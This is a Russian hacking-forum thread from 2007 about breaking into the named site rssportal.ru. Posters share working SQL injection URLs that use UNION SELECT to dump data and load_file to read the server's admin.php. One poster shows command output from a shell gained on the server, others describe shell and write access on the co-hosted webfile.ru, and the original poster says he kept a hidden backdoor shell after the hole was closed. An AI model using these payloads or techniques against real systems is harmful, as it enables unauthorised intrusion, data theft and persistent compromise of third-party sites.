Injection на rssportal.ru

Discussion in 'Уязвимости' started by Micr0b, 1 Jun 2007.

  1. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    Injection на rssportal.ru

    Хотелось бы отметить ету инж., так как там есть сами посмотрите что :)
    Хотя ето не новость :)

    Вот ищо несколько injection на етом же сайте:

    Code:
    http://rssportal.ru/catalog.php?rss_id=-54161+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
    Code:
    http://rssportal.ru/catalog.php?cat_id=-1+UNION+SELECT+1,name,3,4,5,6,7,8+FROM+category/*
    Code:
    http://rssportal.ru/registration.php?uid=1&confirm=blablabla'
    Вот и видео: http://video.antichat.ru/download_228.html
     
    #1 Micr0b, 1 Jun 2007
    Last edited: 14 Jun 2007
    6 people like this.
  2. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Смотрел на ускоренном воспроизведении:) Видео не стоило снимать имхо. Инъекция стандартна. Могли простенькую шифровку пассов поставить..
    PS Вот если бы ты шелл залил, был бы хоть какой то материал.
     
  3. wix

    wix Member

    Joined:
    23 May 2007
    Messages:
    18
    Likes Received:
    5
    Reputations:
    0
    Code:
    http://rssportal.ru/catalog.php?cat_id=-57+UNION+SELECT+1,load_file(%22/home/rss/rssagg.wrk.infostars.ru/htdocs/admin.php%22),3,4,5,6,7,8+FROM+user+WHERE+id=2/*
    
    даж файлы читать мона)
     
    2 people like this.
  4. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    молодец микроб
     
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    .

    Linux frig 2.6.11-1.1369_FC4smp #1 SMP Thu Jun 2 23:08:39 EDT 2005 i686 i686 i386 GNU/Linux
    uid=514(rss) gid=2(daemon) группы=2(daemon),99(nobody),107(rss)
    ;)
     
    #5 Spyder, 2 Jun 2007
    Last edited: 2 Jun 2007
  6. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Вот если бы кто нибудь рут взял;)
     
  7. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    на серваке кстати хостится press.webfile.ru с записью в корень сайта =)
     
  8. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    На webfile.ru запись в корень сайта есть и скуль...шелл тоже там есть :)
     
  9. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    Да и админка там есть )))
     
  10. kot777

    kot777 O-la-la!

    Joined:
    13 Aug 2004
    Messages:
    588
    Likes Received:
    435
    Reputations:
    454
  11. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    УУУ пацаны опередили меня))) я то тоже там нашел маса инэекцый и багов.. но б**я никак неполучалося достучаца нормально.=\
     
  12. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    Вот недавно прикрыли багу, и шелл. Но я успел припрятать ищо один...))

    А вот и старое видео по Создание шелла через SQL_injection на rssportal.ru:
    http://webfile.ru/1455194
     
    #12 Micr0b, 29 Jun 2007
    Last edited: 29 Jun 2007